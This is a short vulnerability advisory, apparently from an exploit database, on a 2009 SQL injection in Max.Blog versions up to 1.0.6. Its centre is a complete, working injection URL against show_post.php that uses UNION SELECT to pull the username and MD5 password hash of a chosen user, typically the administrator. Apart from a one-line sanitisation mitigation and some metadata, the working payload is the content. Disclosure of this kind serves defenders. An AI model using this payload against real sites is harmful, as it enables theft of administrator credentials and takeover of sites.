vendor:
Max.Blog
by:
Salvatore 'drosophila' Fresta
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Max.Blog
Affected Version From: Max.Blog <= 1.0.6
Affected Version To: Max.Blog <= 1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: a:mzbservices:max.blog
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
SQL Injection in Max.Blog
This bug allows a guest to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) by using the following URL: http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.